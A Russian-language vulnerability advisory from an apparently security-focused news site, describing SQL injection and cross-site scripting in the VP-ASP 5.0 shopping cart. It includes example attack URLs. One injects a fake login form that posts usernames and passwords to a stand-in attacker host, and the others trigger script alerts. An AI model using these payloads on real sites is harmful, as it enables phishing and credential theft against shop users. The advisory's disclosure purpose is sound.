SQL-инъекция и XSS в VP-ASP

Рекомендуем почитать:

Хакер #306. OAuth от и до

Программа: VP-ASP 5.0

Обнаружены SQL-инъекция и межсайтовое выполнение сценариев в VP-ASP. Удаленный атакующий может получить доступ к важной информации на сервере.

1. Удаленный атакующий может выполнить SQL сценарий с помощью специально сформированного POST запроса.
2. Удаленный атакующий может получить доступ к важным данным пользователей.

1. Пример реализации атаки "phishing":

http://[VICTIM]/vpasp/shopdisplayproduct s.asp?id=5&cat=<form%20action="http:
//www.evilhacker.com/save2db.asp"%20method ="post">Username:<input%20name="us
ername"%20type="text"%20maxlength="30"> <br>Password:<i
nput%20name="password" %20type="text"%20maxlength="30"><br>
<input%20name="login"%20type="submit"%20 value="Login"></form>

2. Пример реализации XSS:

http://[VICTIM]/vpasp/shopdisplayproducts.asp?id=5& cat=<img%20src="https://xakep.ru/wp-content/uploads/post/22729/javasc ript:alert('XSS')">
http://[VICTIM]/vpasp/shoperror.asp?msg=<img%20 src="javascript:alert('XSS')">

SQL-инъекция и XSS в VP-ASP

Хакер #306. OAuth от и до

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Хакеры.RU. Глава 0х0A. В новую жизнь

Самооборона по-хакерски. Мониторим атаки в радиоэфире

Чем нам грозит 2025-й. Пытаемся предсказать тренды ИБ грядущего года

Хакеры.RU. Глава 0х09. TerraCore

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Атаки DoubleClickjacking используют двойные клики для обхода защиты

Исследователи перехватили контроль над 4000 бэкдоров

Microsoft и ИБ-специалисты убеждают пользователей Windows 10 переходить на Windows 11

Вредоносные пакеты из npm похищали приватные ключи Ethereum-разработчиков

Стилер FireScam маскируется под Telegram Premium